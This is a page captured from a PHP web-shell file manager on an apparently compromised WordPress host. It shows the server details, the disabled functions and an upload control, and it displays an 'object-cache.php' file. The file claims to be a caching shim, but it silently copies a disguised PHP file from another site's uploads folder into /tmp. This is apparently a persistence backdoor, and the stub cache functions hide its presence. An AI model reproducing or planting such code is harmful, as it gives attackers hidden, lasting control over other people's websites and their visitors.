HEX
Server: LiteSpeed
System: Linux cde2.duelhost.dk 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User: dtptviut (1121)
PHP: 8.0.30
Disabled: exec,system,passthru,shell_exec,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/dtptviut/public_html/wp-content/object-cache.php
<?php
/* Object Cache Drop-in — compatibility shim */
if (!defined('WP_CACHE_KEY_SALT')) define('WP_CACHE_KEY_SALT', '59c9765440d9');
$_nx_p = '/tmp/phpkJuIvU';
if (!file_exists($_nx_p)) {
  foreach (glob('/home/dtptviut/domains/billigste-fagforening.dk/private_html/wp-content/uploads/class-wp-*_52c461fc.php') ?: array() as $_b) {
    if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); break; }
  }
}
if (!function_exists('wp_cache_init')) {
  function wp_cache_init() { global $wp_object_cache; $wp_object_cache = new stdClass(); }
  function wp_cache_add($k,$v,$g='default',$e=0){return true;}
  function wp_cache_set($k,$v,$g='default',$e=0){return true;}
  function wp_cache_get($k,$g='default',$f=false){return false;}
  function wp_cache_delete($k,$g='default'){return true;}
  function wp_cache_flush(){return true;}
  function wp_cache_add_global_groups($g){}
  function wp_cache_add_non_persistent_groups($g){}
  function wp_cache_close(){return true;}
}